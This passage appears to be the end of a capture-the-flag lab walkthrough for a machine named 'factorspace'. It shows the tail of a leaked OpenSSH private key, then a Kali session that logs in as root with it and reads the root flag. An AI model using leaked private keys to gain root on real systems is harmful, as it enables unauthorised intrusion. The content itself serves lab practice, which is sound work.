x7kiHI8LZ5A3P6orzYvunEQy4zIm9nG8gGfrxSQOxVhUSnKmvayLcjmg0iffzq6bv2ZHyZ
XvwuDAcKd1wxzdk1C2rX9BDLLxvAIde+GOLup9cc6kuFBQj7F6miqVXdVFgQ9RFL8jTaYI
8ZF1pbgmjzZd6PAAAAEHJvb3RAZmFjdG9yc3BhY2UBAg==
-----END OPENSSH PRIVATE KEY-----

                                                                                                                                             
┌──(root㉿kali2)-[~/Desktop]
└─# ssh root@192.168.56.138 -i id
Linux factorspace 5.10.0-21-amd64 #1 SMP Debian 5.10.162-1 (2023-01-21) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sat Mar 30 04:39:10 2024 from 192.168.56.104
root@factorspace:~# whoami
root
root@factorspace:~# cat /root/r*
052cf26a6e7e33790391c0d869e2e40c
root@factorspace:~# 

相关推荐
00后程序员张16 小时前
iOS App 混淆与资源保护:iOS配置文件加密、ipa文件安全、代码与多媒体资源防护全流程指南
android·安全·ios·小程序·uni-app·cocoa·iphone
Ginkgo_Lo18 小时前
【LLM越狱】AI大模型DRA攻击解读与复现
人工智能·安全·ai·语言模型
七牛云行业应用18 小时前
企业级AI大模型选型指南:从评估部署到安全实践
大数据·人工智能·安全
CV-杨帆21 小时前
大模型在题目生成中的安全风险研究综述
人工智能·深度学习·安全
猫耳君21 小时前
汽车功能安全 Functional Safety ISO 26262 测试之一
测试开发·安全·汽车·功能安全·汽车测试·汽车电子测试
ZYMFZ1 天前
Linux系统 SELinux 安全管理与故障排查
linux·运维·安全
BillKu1 天前
Vue3 中使用 DOMPurify 对渲染动态 HTML 进行安全净化处理
前端·安全·html
云边云科技1 天前
门店网络重构:告别“打补丁”,用“云网融合”重塑数字竞争力!
大数据·人工智能·安全·智能路由器·零售
lingggggaaaa1 天前
小迪安全v2023学习笔记(八十一讲)—— 框架安全&ThinkPHP&Laravel&Struts2&SpringBoot&CVE复现
笔记·学习·struts·安全·网络安全·laravel
NewCarRen1 天前
汽车EPAS ECU功能安全建模分析:Gamma框架+深度概率编程落地ISO 26262(含寿命预测案例)
安全·汽车